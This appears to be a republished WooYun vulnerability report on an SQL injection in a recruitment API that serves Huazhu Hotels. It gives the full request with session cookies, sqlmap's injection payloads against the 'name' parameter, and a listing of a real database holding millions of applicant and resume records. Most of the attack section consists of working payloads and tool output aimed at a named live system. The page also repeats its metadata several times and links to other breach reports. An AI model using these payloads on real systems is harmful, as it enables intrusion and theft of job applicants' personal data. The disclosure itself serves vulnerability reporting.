华住酒店某处接口SQL注入漏洞

2017年5月6日13:26:56评论520 views字数 8895阅读29分39秒阅读模式

摘要

2016-03-13：细节已通知厂商并且等待厂商处理中
2016-03-14：厂商已经确认，细节仅向厂商公开
2016-03-24：细节向核心白帽子及相关领域专家公开
2016-04-03：细节向普通白帽子公开
2016-04-13：细节向实习白帽子公开
2016-04-28：细节向公众公开

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-184337

漏洞标题：华住酒店某处接口SQL注入漏洞

漏洞作者： Looke

提交时间： 2016-03-13 21:22

公开时间： 2016-04-28 16:09

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 18

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞位置：

漏洞地址：

code 区域

POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
 Accept-Language: zh-CN
 X-Requested-With: XMLHttpRequest
 Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
 Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
 Origin: http://recruitofficer.tms.beisen.com
 Accept: application/json, text/javascript, */*; q=0.01
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Accept-Encoding: gzip
 Host: recruitofficer.tms.beisen.com
 Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
 Content-Length: 53
 
 pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*

name参数存在注入

code 区域

---
 Parameter: #1* ((custom) POST)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='
 
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CH
 AR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHA
 R(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
     Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM
 sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys
 6,sysusers AS sys7) AND '%'='
 ---
 [20:30:16] [INFO] testing Microsoft SQL Server
 [20:30:16] [INFO] confirming Microsoft SQL Server
 [20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
 back-end DBMS: Microsoft SQL Server 2008

漏洞证明：

数据库：

数据信息很大的说，看下面，至于都有哪些信息，你们比我更懂,仅作测试，未dump数据库，日志可查，求个高rank可好？

code 区域

Database: BeisenRecruitment001
 +-------------------------------------------------------------+---------+
 | Table                                                       | Entries |
 +-------------------------------------------------------------+---------+
 | dbo.Rel_ObjectDataOfApplicant                               | 21910244 |
 | dbo.StandardResumeDetailValue                               | 18802224 |
 | dbo.RelationHistory                                         | 11254767 |
 | dbo.ApplyDocument                                           | 7516347 |
 | dbo.ApplicantHistory                                        | 6111962 |
 | dbo.ApplicantHistoryDigest                                  | 5173063 |
 | dbo.PhaseTransferHistory                                    | 4925655 |
 | dbo.REL_PersonJobStoreDB                                    | 4376542 |
 | dbo.ResumeExperience                                        | 4144101 |
 | dbo.ApplicantImportCenterInfo                               | 2715594 |
 | dbo.ResumeEducation                                         | 2707816 |
 | dbo.Rel_ObjectDataOfApply                                   | 2616834 |
 | dbo.SearchCV                                                | 2605691 |
 | dbo.SearchCVExtend                                          | 2601771 |
 | dbo.ApplicantProfileLite                                    | 2590488 |
 | dbo.StandradResumeValue                                     | 2469684 |
 | dbo.REL_PersonJobHistory                                    | 2425882 |
 | dbo.PersonApplyStat                                         | 1998890 |
 | dbo.MailMessage                                             | 1339401 |
 | dbo.GenericExtendCounter                                    | 1256675 |
 | dbo.PendingPerson                                           | 1179443 |
 | dbo.ResumeProject                                           | 1056161 |
 | dbo.PersonStoreDbHistory                                    | 938211  |
 | dbo.ApplicantImportCenter                                   | 285102  |
 | dbo.SerialNumber                                            | 266092  |
 | dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574  |
 | dbo.SerialNumberHistory                                     | 243251  |
 | dbo.MessageSentHistory                                      | 240622  |
 | dbo.REL_BeisenUserID                                        | 233569  |
 | dbo.InterviewHistory                                        | 146300  |
 | dbo.Relation_Interview_Interviewee                          | 131212  |
 | dbo.Remark                                                  | 116225  |
 | dbo.JobRelationOperationHistory                             | 107369  |
 | dbo.Rel_PersonAndResumeFilter                               | 89735   |
 | dbo.TitaTaskManage                                          | 81698   |
 | dbo.AppMessage                                              | 78557   |
 | dbo.InterviewInfoHistroy                                    | 76967   |
 | dbo.InterviewInfo                                           | 73927   |
 | dbo.ProxyLog                                                | 73015   |
 | dbo.Relation_Interview_RemindJob                            | 72799   |
 | dbo.ReplyRecord                                             | 62606   |
 | dbo.DownLoadedResume                                        | 61974   |
 | dbo.ProcessPhaseStatusConfig                                | 60397   |
 | dbo.Counter_2                                               | 53073   |
 | dbo.Relation_Interview_Interviewer                          | 51759   |
 | dbo.ReplySetHistory                                         | 48092   |
 | dbo.Rel_PhaseAndStatus                                      | 45542   |
 | dbo.InterviewEvaluateResult                                 | 43635   |
 | dbo.UploadedAttachment                                      | 40956   |
 | dbo.ReplyMessageInfo                                        | 35024   |
 | dbo.InterviewerReplySendRecord                              | 33324   |
 | dbo.JobAdChannel_Class                                      | 28797   |
 | dbo.JobAD                                                   | 27143   |
 | dbo.JobADLoc                                                | 25640   |
 | dbo.Rel_ProcessAndPhase                                     | 24893   |
 | dbo.InterviewFeedBack                                       | 24355   |
 | dbo.JobAd_External                                          | 23578   |
 | dbo.JobBrowseLog                                            | 22272   |
 | dbo.Job                                                     | 19671   |
 | dbo.ProcessPhase                                            | 19285   |
 | dbo.ProcessStatus                                           | 19110   |
 | dbo.JobADAdditionalObject                                   | 17633   |
 | dbo.ResumeTempFolder                                        | 17386   |
 | dbo.ResumeFilter                                            | 16533   |
 | dbo.WechatUserAndPerson                                     | 15892   |
 | dbo.ReportLog                                               | 15809   |
 | dbo.Rel_ResumeTempFolderAndUser                             | 15744   |
 | dbo.EmaiJobRule                                             | 15392   |
 | dbo.JobLoc                                                  | 12968   |
 | dbo.ProcessReason                                           | 11750   |
 | dbo.JobAdChannel_Apply                                      | 10986   |
 | dbo.Officer                                                 | 10885   |
 | dbo.Rel_StatusAndReason                                     | 10446   |
 | dbo.ResumeDownload                                          | 9883    |
 | dbo.REL_ObjectId_ShareGroupId                               | 9232    |
 | dbo.OfferHistory                                            | 9049    |
 | dbo.InterviewerReply                                        | 8989    |
 | dbo.BatchRankingScore                                       | 7436    |
 | dbo.RecieveSummary                                          | 7283    |
 | dbo.Rel_ApplicantAndLabel                                   | 7135    |
 | dbo.REL_JobAndInterviewEvaluation                           | 6754    |
 | dbo.SendMailLog                                             | 6420    |
 | dbo.InterviewEvaluationDetailItem                           | 6050    |
 | dbo.ExportHistory                                           | 5984    |
 | dbo.ApplicantViewCondition                                  | 5980    |
 | dbo.ConstItem                                               | 5913    |
 | dbo.TitaPorjectManage                                       | 5753    |
 | dbo.Permission                                              | 5176    |
 | dbo.EffectiveOffer                                          | 4958    |
 | dbo.EffectiveOfferApply                                     | 4898    |
 | dbo.RecruitProcess                                          | 4599    |
 | dbo.HrJobBrowseLog                                          | 4484    |
 | dbo.OfferAssesment                                          | 4049    |
 | dbo.OfferCreaterMailInfo                                    | 3849    |
 | dbo.Offer                                                   | 3779    |
 | dbo.Interview                                               | 3595    |
 | dbo.AutoInvitTest                                           | 3348    |
 | dbo.ApplicantView                                           | 3009    |
 | dbo.Rel_InternalRecommend                                   | 2994    |
 | dbo.OfferApply                                              | 2849    |
 | dbo.Relation_InterviewMessage_Interviewee                   | 2627    |
 | dbo.StoreDB                                                 | 2440    |
 | dbo.Finder                                                  | 2141    |
 | dbo.SearchFieldOption                                       | 1956    |
 | dbo.StaticizeLog                                            | 1899    |
 | dbo.Attention                                               | 1852    |
 | dbo.BizLookLog                                              | 1711    |
 | dbo.ChannelRelation                                         | 1657    |
 | dbo.MicroProcessMessageLog                                  | 1335    |
 | dbo.InterviewLocation                                       | 1316    |
 | dbo.RewardRulesSublist                                      | 1098    |
 | dbo.StatisticsThisMonth                                     | 1035    |
 | dbo.JobADPostUserName                                       | 919     |
 | dbo.ConstItemId                                             | 825     |
 | dbo.ApplicantLock                                           | 739     |
 | dbo.RecruitPackage                                          | 716     |
 | dbo.ChannelAuthorize                                        | 691     |
 | dbo.ChannelSource                                           | 677     |
 | dbo.ExamRoomPlan                                            | 666     |
 | dbo.InterviewInfoType                                       | 632     |
 | dbo.BadMessage                                              | 604     |
 | dbo.InterviewSession                                        | 573     |
 | dbo.MicroProcessActivity                                    | 566     |
 | dbo.BlackListHistory                                        | 545     |
 | dbo.RewardRules                                             | 457     |
 | dbo.RecuritProject                                          | 440     |
 | dbo.BlackList                                               | 419     |
 | dbo.MicroProcess                                            | 360     |
 | dbo.ExportFieldTemplate                                     | 357     |
 | dbo.WebotSyncRecord                                         | 336     |
 | dbo.ChannelDeliveryMapping                                  | 310     |
 | dbo.InterviewEvaluationPartItem                             | 309     |
 | dbo.GlobalSetting                                           | 296     |
 | dbo.ResumeKeywordsLibrary                                   | 294     |
 | dbo.HunterAccount                                           | 249     |
 | dbo.Label                                                   | 242     |
 | dbo.MailReceiveStrategy                                     | 238     |
 | dbo.ReceiveEmailList                                        | 238     |
 | dbo.IndexMap                                                | 192     |
 | dbo.JobTitleLibrary                                         | 185     |
 | dbo.Duty                                                    | 182     |
 | dbo.ReSendEmailOrSmsHistory                                 | 177     |
 | dbo.StandardResumeDetailField                               | 157     |
 | dbo.Station                                                 | 141     |
 | dbo.ConstType                                               | 136     |
 | dbo.CadidateId                                              | 131     |
 | dbo.InterviewEvaluationBasicInfo                            | 126     |
 | dbo.JobTemplate                                             | 125     |
 | dbo.SelectAllPageErrorInfo                                  | 121     |
 | dbo.InterviewEvaluate                                       | 101     |
 | dbo.InterviewSite                                           | 97      |
 | dbo.MarketActivity                                          | 96      |
 | dbo.WeChatOfficer_MyRecommend_CountResult                   | 73      |
 | dbo.FromList                                                | 56      |
 | dbo.Requirement                                             | 56      |
 | dbo.TalentMining                                            | 52      |
 | dbo.WeChatOfficer_PyInternal_CountResult                    | 49      |
 | dbo.Relation_InterviewMessage_Officer                       | 47      |
 | dbo.InterviewEvaluationDictDetial                           | 40      |
 | dbo.Assesment                                               | 39      |
 | dbo.InterviewSite_Officers                                  | 36      |
 | dbo.ExamRoom                                                | 28      |
 | dbo.RestTime                                                | 28      |
 | dbo.Widget_Option                                           | 28      |
 | dbo.Medium                                                  | 27      |
 | dbo.RankAndFilter                                           | 25      |
 | dbo.Invitation                                              | 23      |
 | dbo.ApplicantLockSet                                        | 18      |
 | dbo.WeChatOfficer_RedEnvelopes                              | 16      |
 | dbo.RankingScoreHistory                                     | 15      |
 | dbo.StandardResumeDetailSection                             | 14      |
 | dbo.ActionTiggerCondition                                   | 13      |
 | dbo.ActionForSendNotification                               | 11      |
 | dbo.RecuritProjectCondition                                 | 11      |
 | dbo.AutoTask                                                | 10      |
 | dbo.Functions                                               | 10      |
 | dbo.ChannelKind                                             | 9       |
 | dbo.StandardResumeField                                     | 9       |
 | dbo.MediumGroup                                             | 8       |
 | dbo.Widget                                                  | 7       |
 | dbo.InterviewEvaluationDictType                             | 4       |
 | dbo.TaskItem                                                | 3       |
 | dbo.AccessmentResultForUpdateApply                          | 2       |
 | dbo.DefaultEmailReceiveStrategy                             | 2       |
 | dbo.InterviewEamilEvaluation                                | 1       |
 +-------------------------------------------------------------+---------+
 
 Database: msdb
 +-------------------------------------------------------------+---------+
 | Table                                                       | Entries |
 +-------------------------------------------------------------+---------+
 | dbo.backupfile                                              | 975572  |
 | dbo.backupset                                               | 487786  |
 | dbo.backupmediafamily                                       | 487783  |
 | dbo.backupmediaset                                          | 487783  |
 | dbo.restorefile                                             | 68      |
 | dbo.restorefilegroup                                        | 34      |
 | dbo.restorehistory                                          | 34      |
 | dbo.syspolicy_configuration                                 | 4       |
 +-------------------------------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-14 16:09

厂商回复：

您好！感谢对华住酒店集团的关注，此问题己移交相关团队跟进处理。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

左青龙
微信扫一扫

右白虎
微信扫一扫

华住酒店某处接口SQL注入漏洞

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-184337

漏洞标题：华住酒店某处接口SQL注入漏洞

相关厂商：汉庭酒店

漏洞作者： Looke

提交时间： 2016-03-13 21:22

公开时间： 2016-04-28 16:09

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 18

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息，再附加后台弱口令一发

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

中国海洋石油总公司VPN弱密码可入内网

51CTO某处HTTP头注入

发表评论

漏洞概要 关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-184337

漏洞标题： 华住酒店某处接口SQL注入漏洞

相关厂商： 汉庭酒店

漏洞作者： Looke

提交时间： 2016-03-13 21:22

公开时间： 2016-04-28 16:09

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 18

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

发表评论

漏洞概要关注数(12) 关注此漏洞

漏洞标题：华住酒店某处接口SQL注入漏洞

相关厂商：汉庭酒店

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无